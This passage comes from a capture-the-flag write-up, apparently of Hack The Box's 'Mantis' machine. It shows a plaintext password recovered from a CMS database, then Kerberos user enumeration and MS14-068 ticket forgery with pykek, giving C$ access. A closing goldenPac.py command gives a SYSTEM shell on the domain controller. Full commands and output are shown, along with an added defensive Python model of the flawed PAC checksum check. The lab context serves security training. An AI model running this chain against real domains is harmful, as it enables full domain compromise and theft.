blog_Orchard_Roles_UserRolesPartRecord                      
blog_Orchard_Packaging_PackagingSource                      
blog_Orchard_Recipes_RecipeStepResultRecord                 
blog_Orchard_OutputCache_CacheParameterRecord               
blog_Orchard_MediaProcessing_ImageProfilePartRecord         
blog_Orchard_MediaProcessing_FilterRecord                   
blog_Orchard_MediaProcessing_FileNameRecord                 
blog_Orchard_Widgets_LayerPartRecord                        
blog_Orchard_Widgets_WidgetPartRecord                       
blog_Orchard_Comments_CommentPartRecord                     
blog_Orchard_Comments_CommentsPartRecord                    
blog_Orchard_Taxonomies_TaxonomyPartRecord                  
blog_Orchard_Taxonomies_TermPartRecord                      
blog_Orchard_Taxonomies_TermContentItem                     
blog_Orchard_Taxonomies_TermsPartRecord                     
blog_Orchard_MediaLibrary_MediaPartRecord                   
blog_Orchard_Blogs_BlogPartArchiveRecord  

We have a user table, blog_Orchard_Users_UserPartRecord.

SQL> select username,password from orcharddb.dbo.blog_Orchard_Users_UserPartRecord
username	password                                                                                                                                                                                                                                                          

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

admin	AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==                                                                                                                                                                                              

James	J@m3s_P@ssW0rd!                                                           

One of the users’ credentials is stored in plain text.

User: james Pass: J@m3s_P@ssW0rd!

Let’s make a note of the user in users.txt and the password in passwords.txt.

Let’s check if james is a member of the domain.

____ $/opt/tools/kerbrute userenum users.txt --dc htb.local -d htb.local

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/23/21 - Ronnie Flathers @ropnop

2021/07/23 13:40:21 >  Using KDC(s):
2021/07/23 13:40:21 >   htb.local:88

2021/07/23 13:40:21 >  [+] VALID USERNAME:       james@htb.local
2021/07/23 13:40:21 >  Done! Tested 2 usernames (1 valid) in 0.191 seconds

james is a user in the htb.local domain.

____ $crackmapexec smb htb.local -u users.txt -p passwords.txt --shares
SMB         10.129.167.60   445    MANTIS           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:MANTIS) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.129.167.60   445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 
SMB         10.129.167.60   445    MANTIS           [+] Enumerated shares
SMB         10.129.167.60   445    MANTIS           Share           Permissions     Remark
SMB         10.129.167.60   445    MANTIS           -----           -----------     ------
SMB         10.129.167.60   445    MANTIS           ADMIN$                          Remote Admin
SMB         10.129.167.60   445    MANTIS           C$                              Default share
SMB         10.129.167.60   445    MANTIS           IPC$                            Remote IPC
SMB         10.129.167.60   445    MANTIS           NETLOGON        READ            Logon server share 
SMB         10.129.167.60   445    MANTIS           SYSVOL          READ            Logon server share 

After a lot of enumeration, I found two references that describe the rest of the path:

http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html

/etc/krb5.conf needs to have information about the domain. Based on the blog, I’ll set mine to:

[libdefaults]
    default_realm = HTB.LOCAL

[realms]
    # Realm names are case-sensitive and conventionally upper-case
    HTB.LOCAL = {
        kdc = mantis.htb.local:88
        admin_server = mantis.htb.local
        default_domain = htb.local
    }

[domain_realm]
    # Map the DNS domain, and every host under it, onto the realm
    .htb.local = HTB.LOCAL
    htb.local = HTB.LOCAL

I’ll use rdate to check the remote time and make sure it’s within five minutes of my host’s time.

Generate Kerberos Ticket

First I’ll test this config and try to generate a Kerberos ticket:

root@kali# kinit james
Password for james@HTB.LOCAL: 

klist will show the ticket:

root@kali# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: james@HTB.LOCAL

Valid starting       Expires              Service principal
08/30/2020 16:44:33  08/31/2020 02:44:33  krbtgt/HTB.LOCAL@HTB.LOCAL
        renew until 08/31/2020 16:44:26

I can try to connect to C$, and it will fail:

root@kali# smbclient -W htb.local //mantis/c$ -k
tree connect failed: NT_STATUS_ACCESS_DENIED

That makes sense, since this ticket is for james. If I try to connect to SYSVOL, it works:

root@kali# smbclient -W htb.local //mantis/sysvol -k
Try "help" to get a list of possible commands.
smb: \>

Forge Golden Ticket

First I need the SID for the james user. I’ll get it via rpcclient:

rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

I found a copy of ms14-068.py (the pykek script, which I placed under /opt/pykek), and I'll run it just as its help suggests, passing the user, the SID from rpcclient, and the domain controller:

root@kali# python /opt/pykek/ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password: 
  [+] Building AS-REQ for mantis.htb.local... Done!
  [+] Sending AS-REQ to mantis.htb.local... Done!
  [+] Receiving AS-REP from mantis.htb.local... Done!
  [+] Parsing AS-REP from mantis.htb.local... Done!
  [+] Building TGS-REQ for mantis.htb.local... Done!
  [+] Sending TGS-REQ to mantis.htb.local... Done!
  [+] Receiving TGS-REP from mantis.htb.local... Done!
  [+] Parsing TGS-REP from mantis.htb.local... Done!
  [+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!

This creates a file, TGT_james@htb.local.ccache. I'll copy it over the default credential cache, /tmp/krb5cc_0 (the cache klist showed earlier), so that Kerberos-aware tools pick up the forged ticket instead of the legitimate one:

root@kali# cp TGT_james@htb.local.ccache /tmp/krb5cc_0
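
Why does the KDC accept a ticket that a plain domain user built? MS14-068 (CVE-2014-6324) came down to the KDC honouring whatever checksum type the PAC signature claimed, including unkeyed ones like RSA-MD5 that anyone can compute. The following Python is an added example for this write-up, not code from the post, from pykek or from impacket: it models the PAC signature check before and after the patch, using james's real SID from the rpcclient output. The dict-based PAC and its encoding are a teaching stand-in for the real NDR-encoded MS-PAC structure, the krbtgt key is a constructed placeholder, and the checksum-type numbers are the real RFC 3961 / MS-PAC values.

```python
"""Simplified model of the PAC signature check that MS14-068 (CVE-2014-6324) fixed.

Added example for this write-up; it is not code from the post, from pykek
or from impacket.  The PAC here is a small dict with a hand-rolled encoding,
a teaching stand-in for the real NDR-encoded MS-PAC structure, and the
krbtgt key is a constructed placeholder.  The checksum-type numbers are the
real RFC 3961 / MS-PAC values.
"""
from __future__ import annotations

import hashlib
import hmac
import re

# Kerberos checksum types (RFC 3961 section 8, MS-PAC section 2.8).
CKSUMTYPE_RSA_MD5 = 7        # unkeyed: anyone can compute it
CKSUMTYPE_HMAC_MD5 = -138    # keyed: needs the signing key (KERB_CHECKSUM_HMAC_MD5)
KEYED_TYPES = {CKSUMTYPE_HMAC_MD5}

# Well-known RIDs used in the demo below.
RID_DOMAIN_ADMINS = 512
RID_DOMAIN_USERS = 513

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid: str) -> tuple[str, int]:
    """Split an account SID into (domain SID, RID), as goldenPac.py prints them."""
    m = SID_RE.match(sid)
    if m is None:
        raise ValueError(f"not a domain account SID: {sid}")
    return m.group(1), int(m.group(2))


def encode_pac(pac: dict) -> bytes:
    """Deterministic byte form of the teaching PAC (stand-in for NDR marshalling)."""
    groups = ",".join(str(r) for r in sorted(pac["group_rids"]))
    return f"{pac['user']}|{pac['domain_sid']}|{pac['user_rid']}|{groups}".encode()


def pac_checksum(cksumtype: int, data: bytes, key: bytes | None) -> bytes:
    """Compute a PAC signature of the given checksum type over data."""
    if cksumtype == CKSUMTYPE_RSA_MD5:
        return hashlib.md5(data).digest()              # no key involved at all
    if cksumtype == CKSUMTYPE_HMAC_MD5:
        if key is None:
            raise ValueError("keyed checksum needs a key")
        # Real RC4-HMAC signing derives a sub-key first; omitted here for brevity.
        return hmac.new(key, data, hashlib.md5).digest()
    raise ValueError(f"unsupported checksum type {cksumtype}")


def kdc_accepts_pac(pac: dict, cksumtype: int, sig: bytes,
                    krbtgt_key: bytes, patched: bool) -> bool:
    """Model of the KDC validating the PAC signature on a TGS-REQ.

    patched=False: pre-MS14-068 behaviour, which honoured whatever checksum
    type the ticket named, including unkeyed ones.
    patched=True:  fixed behaviour, which refuses unkeyed types before it even
    looks at the signature bytes.
    """
    if patched and cksumtype not in KEYED_TYPES:
        return False
    key = krbtgt_key if cksumtype in KEYED_TYPES else None
    expected = pac_checksum(cksumtype, encode_pac(pac), key)
    return hmac.compare_digest(expected, sig)


def demo() -> dict[str, bool]:
    """Run james's SID from the post through both KDC behaviours."""
    domain_sid, rid = split_sid("S-1-5-21-4220043660-4019079961-2895681657-1103")
    krbtgt_key = b"constructed-krbtgt-key-not-real"   # placeholder, never the real key

    # What the DC would legitimately issue for james: Domain Users only.
    legit = {"user": "james", "domain_sid": domain_sid, "user_rid": rid,
             "group_rids": [RID_DOMAIN_USERS]}
    legit_sig = pac_checksum(CKSUMTYPE_HMAC_MD5, encode_pac(legit), krbtgt_key)

    # The MS14-068 case: same account, Domain Admins added, "signed" with MD5,
    # which needs no key.
    elevated = dict(legit, group_rids=[RID_DOMAIN_USERS, RID_DOMAIN_ADMINS])
    md5_sig = pac_checksum(CKSUMTYPE_RSA_MD5, encode_pac(elevated), None)

    return {
        "legit_accepted_patched": kdc_accepts_pac(legit, CKSUMTYPE_HMAC_MD5, legit_sig, krbtgt_key, True),
        "unkeyed_accepted_unpatched": kdc_accepts_pac(elevated, CKSUMTYPE_RSA_MD5, md5_sig, krbtgt_key, False),
        "unkeyed_rejected_patched": not kdc_accepts_pac(elevated, CKSUMTYPE_RSA_MD5, md5_sig, krbtgt_key, True),
        # Editing a keyed-signed PAC without the key is caught either way.
        "tampered_keyed_rejected": not kdc_accepts_pac(elevated, CKSUMTYPE_HMAC_MD5, legit_sig, krbtgt_key, False),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The takeaway for a defender is in kdc_accepts_pac: the patched branch rejects the ticket on checksum type alone, so the MD5-"signed" PAC never reaches the comparison. That is exactly why the 2008 R2 box here, which "found vulnerable" in the goldenPac output below, needs the MS14-068 update rather than any change to krbtgt.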

Filesystem Access

Now the same C$ connection that failed a moment ago succeeds, and I have access to the entire filesystem:

root@kali# smbclient -W htb.local //mantis/c$ -k
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Fri Sep  1 10:19:03 2017
  Documents and Settings            DHS        0  Tue Jul 14 01:06:44 2009
  inetpub                             D        0  Fri Sep  1 09:41:09 2017
  pagefile.sys                      AHS 2146951168  Wed Sep  2 16:33:23 2020
  PerfLogs                            D        0  Mon Jul 13 23:20:08 2009
  Program Files                      DR        0  Sat Dec 23 22:28:26 2017
  Program Files (x86)                DR        0  Fri Sep  1 14:28:51 2017
  ProgramData                        DH        0  Fri Sep  1 09:16:24 2017
  Recovery                          DHS        0  Fri Sep  1 01:39:12 2017
  System Volume Information         DHS        0  Thu Aug 31 20:02:33 2017
  Users                              DR        0  Fri Sep  1 10:19:01 2017
  Windows                             D        0  Sat Dec 23 22:31:49 2017

                5480959 blocks of size 4096. 288821 blocks available

I can grab both flags:

smb: \> get Users\james\desktop\user.txt
getting file \Users\james\desktop\user.txt of size 32 as Users\james\desktop\user.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

smb: \> get Users\administrator\desktop\root.txt
getting file \Users\administrator\desktop\root.txt of size 32 as Users\administrator\desktop\root.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

Alternatively, impacket's goldenPac.py chains the same MS14-068 ticket forgery with a psexec-style service upload in one step, and drops straight into a shell as SYSTEM:

$ /usr/share/doc/python3-impacket/examples/goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file AHYRyTll.exe
[*] Opening SVCManager on mantis.....
[*] Creating service LPnK on mantis.....
[*] Starting service LPnK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>ifconfig
b"'ifconfig' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::41a8:e26c:362f:e7d6
   Link-local IPv6 Address . . . . . : fe80::41a8:e26c:362f:e7d6%11
   IPv4 Address. . . . . . . . . . . : 10.129.167.60
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c35e%11
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

This post is licensed under CC BY 4.0 by the author.